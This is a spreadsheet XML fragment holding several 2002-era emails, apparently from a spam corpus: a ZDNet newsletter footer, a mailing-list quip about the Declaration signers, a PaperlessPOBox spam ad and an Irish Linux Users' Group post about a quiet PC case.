 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6w8t6-Id5q0_HZB17WnR" &gt;
 &lt;b&gt;Take our Quick Poll&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=2f-hYaFIqnzAablrW5P26D_8gaZjMeR"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href="http://clickthru.online.com/Click?q=44-9nxfIZUtYM2hxvgEMLKlXBDgnVsR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Q&amp;A&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMnewNYlpW-B_KMqztFR" &gt;
 &lt;b&gt;Caldera VP bullish on UnitedLinux&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In part two of a Tech Update interview, &lt;b&gt;Benoy Tamang&lt;/b&gt;, Caldera VP of 
 strategic development, discusses UnitedLinux's strategy regarding additional 
 members and competition in the enterprise Linux space. 
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bZWfG9QA5K-fxuEL59R" &gt;
 &lt;b&gt;Putting Web services to work&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Want to get your feet wet integrating Web services? Find out how to &lt;b&gt;integrate Web services&lt;/b&gt; on a small scale and how particular platforms can simplify your efforts.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lF1Q8zhtuoAABMMPZ9rR" &gt;
 &lt;b&gt;Should all storage be encrypted?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Start-up &lt;b&gt;NeoScale&lt;/b&gt; claims that its new storage encryption appliance 
 can secure any or all data bound for &lt;b&gt;Fibre Channel&lt;/b&gt;-based storage--with no impact on performance.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjO9jvHW2H3f2jvrqULlR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1LJF21058-mhe2RYEVu4R" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0ExfrG7J60_4Mc3148lk6yR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVzOdjZE1WTRnU3P83P5XlR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgwytdTpFmeE4rbg6amtI4R" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XWrJ4X3FCssDLfzpHOCerR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRd4OB7zlFPEL2t1VlTK8yiR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4ihaB4YFvwlGWUTnaNtPR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtzsjzZwRMWz8AtIQwjjnR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=67-PnDkIOEDC4CusARWhKPAKa1CPIuR" &gt;Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPd2Bh-I9Uywq2NRJSBTZR" &gt;Check out these personal laser printer picks at ZDNet Reviews.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTt5H4xCOzeFOPq1FsnynR" &gt;See how WAP works and how you should use it at Builder.com.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwDbwN5pOLF5vLk7KCgFeR" &gt;Need a new job? Find one today in ZDNet's Career Center.&lt;/A&gt; &lt;P&gt; &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6Bdh4H6VcMmobF8XEDxwcyR" &gt;CIOs talk out about the future of IT at CNET News.com.&lt;/A&gt;&lt;/b&gt;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href='http://clickthru.online.com/Click?q=d2-THG_rXLB_KpNFPfSGPD_5DYVkreb99RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfB7UCDVVqS8CMB0qvseR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4ccn4xra9-0t3VVat9yR"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href="http://clickthru.online.com/Click?q=11-l8riI2-4W1dypxEX3VynhNBuCqlR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2assUdFiSkMRUVolYrBeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKh0-jpY0VXXjhrHNHyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7tvxDGJlh9GpMUHM3FR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIFsagSIgsPj9y-DzbW-9R" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOsmhmhLbDr4q1O7VpJcR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCXqmilpVb8HYULuonXiR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGWUyrDxsIC1b2OB8OEPR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZBRt--Tc6RaT-Dc13yE_rR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d0-vjOh-_W18jk9n8qNXzSH-KgyDsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">At 4:12 PM +0000 on 9/3/02, Russell Turpin wrote:
 &gt; Of the 56 signers of the Declaration of Independence,
 &gt; only two were in their twenties at the time. Their
 &gt; average age was forty-five. There were no teenagers.
 &gt; Fourteen were over fifty. Ben Franklin was the oldest,
 &gt; at seventy. For the most part, these were angry,
 &gt; middle-aged men.
 I think it was George Carlin who said something to the effect that young
 men in general are boring, but, around fifty, men either have everything
 they ever wanted, or have almost nothing of what they wanted; either of
 which makes them behave quite interestingly.
 Cheers,
 RAH
 -- 
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "Never underestimate the power of stupid people in large groups."
 --George Carlin
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Postal Mail Via Email - Anytime, anywhere
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=700 align=center bgColor=black&gt;
   &lt;TR bgcolor="#FFFFFF"&gt; 
     &lt;TD align=middle colspan="3"&gt;
       &lt;div align="left"&gt;&lt;/div&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TBODY&gt; 
   &lt;TR&gt; 
     &lt;TD align=middle width=322 bgColor=black nowrap&gt; 
       &lt;div align="center"&gt;&lt;FONT face=Arial,Helvetica 
       color=white size=5&gt;&lt;B&gt;Get Your Postal Mail&lt;/B&gt; &lt;/FONT&gt;&lt;FONT 
       face=Arial,Helvetica color=black size=1&gt;&lt;BR&gt;
         &lt;BR&gt;
         &lt;/FONT&gt;&lt;FONT 
       face=Arial,Helvetica color=white size=5&gt;&lt;B&gt;Anytime, Anywhere&lt;/B&gt; &lt;/FONT&gt;&lt;FONT face=Verdana,Arial,Helvetica color=black 
       size=1&gt;&lt;BR&gt;
         &lt;BR&gt;
         &lt;/FONT&gt;&lt;FONT face=Arial,Helvetica color=white size=5&gt;&lt;B&gt;Via Email&lt;/B&gt; 
         &lt;/FONT&gt;&lt;/div&gt;
     &lt;/TD&gt;
     &lt;TD align=middle bgColor=black&gt;&lt;IMG src="http://66.88.27.168/global/SixImages.jpg" 
       border=0&gt; &lt;/TD&gt;
     &lt;TD align=middle bgColor=black&gt;&lt;IMG 
       src="http://66.88.27.168/global/PaperlessPOBoxLogoNarrow.gif" border=0&gt; 
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;/TBODY&gt; 
 &lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=700 align=center bgColor=white 
 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=314 align=center bgColor=white 
       border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;What Is 
             It?&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;PaperlessPOBox is the fast, easy, and secure way 
             to receive your postal mail &lt;B&gt;from any email program or web 
             browser.&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=black colSpan=2 height=2&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;Stay In 
             Touch&amp;nbsp;&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;Receive your postal mail at hotels, airports, 
             satellite offices, Internet cafes - anywhere with email or web 
             access. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=black colSpan=2 height=2&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;Private and 
             Secure&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;Data encrypted password-protected account access 
             insures privacy. Mail is opened and scanned by high-speed machines 
             that process hundreds of mail pieces per hour. Mail safety concerns 
             are eliminated. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=black colSpan=2 height=2&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;Easy&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;PaperlessPOBox is as simple to use as email. Each 
             mail piece is converted to an image file. Simply open the image file 
             and view it with the free Adobe PDF viewer. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=black colSpan=2 height=2&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;Fast&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;Important Correspondence is sent same-day via 
             email using PaperlessPOBoxs proprietary sorting technology. 
           &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=black colSpan=2 height=2&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=110 bgColor=white&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica color=red size=2&gt;&lt;B&gt;No More &lt;BR&gt;Junk 
             Mail&lt;/B&gt;&lt;/FONT&gt; &lt;/TD&gt;
           &lt;TD width=240 bgColor=white&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             color=black size=1&gt;Opt for the first-class only feature to have junk 
             mail removed from your life. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=8 align=center bgColor=white 
       border=0&gt;
         &lt;TBODY&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=378 bgColor=white border=0 
       VALIGN="top"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=10&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=5"&gt;&lt;IMG 
             src="http://66.88.27.168/global/sign_up_now.gif" border=0&gt;&lt;/A&gt; &lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle bgColor=yellow colSpan=2&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica size=2&gt;Enter promo code XVXKL to get 
             &lt;B&gt;ONE MONTH FREE&lt;/B&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle bgColor=white colSpan=2&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica size=1&gt;Pay for month 1 - get a credit 
             for the same amount for month 2. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=10&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle&gt;&lt;FONT face=Verdana,Arial,Helvetica size=1&gt;Service 
             plans start at just $29.95 per month. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=10&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle&gt;&lt;FONT face=Verdana,Arial,Helvetica size=1&gt;Get your 
             new PaperlessPOBox address in just 5 minutes. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=10&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle bgColor=yellow colSpan=2&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica size=2&gt;UNCONDITIONAL MONEY-BACK 
             GUARANTEE &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle bgColor=white colSpan=2&gt;&lt;FONT 
             face=Verdana,Arial,Helvetica size=1&gt;Cancel anytime during the first 
             30 days for a full refund. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=20&gt;&amp;nbsp;&lt;/TD&gt;
         &lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=middle&gt;&lt;FONT face=Verdana,Arial,Helvetica size=2&gt;&lt;B&gt;Find 
             Out More&lt;/B&gt; &lt;/FONT&gt;&lt;BR&gt;&lt;FONT face=Verdana,Arial,Helvetica 
             size=1&gt;Click On An Icon Below &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white colSpan=2 height=20&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=378 bgColor=white border=0 
       VALIGN="top"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=236"&gt;&lt;IMG 
             src="http://66.88.27.168/global/SmallFrameVideo.jpg" width=45 border=0&gt;&lt;BR&gt;
             &lt;FONT 
             face=Verdana,Arial,Helvetica size=2&gt;5 Minute&lt;BR&gt;Video&lt;/font&gt;&lt;/A&gt; &lt;/TD&gt;
           &lt;TD align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=230"&gt;&lt;IMG 
             src="http://66.88.27.168/global/SmallFrameNews.jpg" width=45 border=0&gt;&lt;BR&gt;
             &lt;FONT 
             face=Verdana,Arial,Helvetica size=2&gt;In The&lt;BR&gt;News&lt;/font&gt;&lt;/A&gt; &lt;/TD&gt;
           &lt;TD align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=17"&gt;&lt;IMG 
             src="http://66.88.27.168/global/SmallFrameTellMeMore.jpg" width=45 
             border=0&gt;&lt;BR&gt;
             &lt;FONT face=Verdana,Arial,Helvetica size=2&gt;How 
             It&lt;BR&gt;Works&lt;/font&gt;&lt;/A&gt; &lt;/TD&gt;
           &lt;TD align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=239"&gt;&lt;IMG 
             src="http://66.88.27.168/global/SmallFrameSampleCorrespondence.jpg" width=45 
             border=0&gt;&lt;BR&gt;
             &lt;FONT face=Verdana,Arial,Helvetica 
             size=2&gt;Sample&lt;BR&gt;Letters&lt;/font&gt;&lt;/A&gt; &lt;/TD&gt;
           &lt;TD align=middle&gt;&lt;A 
             href="http://www.paperlesspobox.com/servlet/HomeServlet?gotopage=13"&gt;&lt;IMG 
             src="http://66.88.27.168/global/SmallFrameHome.jpg" width=45 border=0&gt;&lt;BR&gt;
             &lt;FONT 
             face=Verdana,Arial,Helvetica size=2&gt;Home&lt;BR&gt;Page&lt;/font&gt;&lt;/A&gt; 
         &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=700 align=center bgColor=#ff0000 
 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=white colSpan=2 height=10&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgColor=black colSpan=2 height=5&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=left bgColor=black&gt;&lt;FONT face=Verdana,Arial,Helvetica 
       color=white size=2&gt;&lt;B&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;PaperlessPOBox 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Postal Service Mail Via Email&lt;/B&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgColor=black colSpan=2 height=5&gt;&lt;/TD&gt;&lt;/TR&gt; 
     &lt;TD bgColor=white colSpan=2&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;This 
 message has been sent to you in compliance with our strict anti-abuse regulations. 
 If you do not wish to receive further mailings, please send a blank mail 
 to &lt;a href="mailto:bestoffers@dishnetdsl.net?subject=Remove"&gt;bestoffers@dishnetdsl.net&lt;/a&gt; 
 with Remove as subject.&lt;/font&gt;&lt;/TD&gt;
   &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Update on  PC Cases
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all, I posted the below question to this list so I thought I'd update you
 all. Thanks for your suggestions.
 Well, I'd decided to bite the bullet and spend big on a new case and CPU
 fan.
 I bought a lian-li aluminum case. It was expensive as cases go (stg133.86)
 but I decided, it's a good basis to build any future PC on.
 It has 4 x 51/4" drive bays and 6 x 3" drive bays so I should be ok for
 future upgrades etc. I have to say it was worth it. Its a pleasure to work
 on. It has a slide out tray to mount the Mother Board on, both sides come
 off, the drive bays come out...all without using a screwdriver (thumb
 screws). Even the edges inside the case are smooth so no banging your hands
 off shape edges etc. There are 4 fans inside the case, which can be set to 3
 different speeds. There are 4 usb ports on the front of the box too. The box
 is big and has loads of room inside.
 Oh... and it looks very cool :-)
 However there are 2 things to look out for. On the Maplins website it says
 * Up to three 80mm case fans can be fitted!
 * ATX Power supply sold separately
 In fact the case came with 4 fans and a power supply, which is great but I
 ordered 2 fans and a power supply separately.
 Also the case was a slightly different model to one advertised, as I got the
 USB model. It does say (Product may vary in design and specification from
 that show) but I missed that :-)
 I also bought a Flower Cooler Kit which is completely silent. Very nice.
 (thanks Mike)
 So now I can code-in-peace...
 Justin
 &gt; -----Original Message-----
 &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
 &gt; Justin MacCarthy
 &gt; Sent: Monday, August 12, 2002 12:56 PM
 &gt; To: Ilug@Linux.Ie
 &gt; Subject: [ILUG] PC Cases
 &gt;
 &gt;
 &gt; Hi all, I have a Linux box at home that makes a god awful amount of noise.
 &gt; Its a Athlon XP 1900+  with a  CoolerMaster fan.  Are they particularly
 &gt; noisy? I think its  the case/psu fan. It was a pretty cheap case. So what
 &gt; I'm looking for a quieter case/fan/power supply. I know you can get really
 &gt; quiet cases if you want to spend, but I'm looking for something in the
 &gt; middle ground, available in Dublin.
 &gt;
 &gt; Anyone recommend anything ? Thanks
 &gt;
 &gt; Justin
 &gt;
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 &gt;
 &gt;
 -- 
